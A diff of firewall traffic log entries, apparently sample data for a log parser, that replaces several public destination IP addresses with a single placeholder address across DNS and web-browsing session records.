+Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
+Oct 30 09:46:22 1,2012/10/30 
09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 
09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 
04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:50,24961,1,52531,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10
 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25194,1,56463,53,0,0,0x200000,udp,allow,214,77,137,2,2012/04/10 
04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1
 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26257,1,55849,53,0,0,0x200000,udp,allow,170,77,93,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 
04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:49,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24844,1,56995,53,0,0,0x200000,udp,allow,176,176,0,2,2012/04/10 04:39:18,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 
04:39:48,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
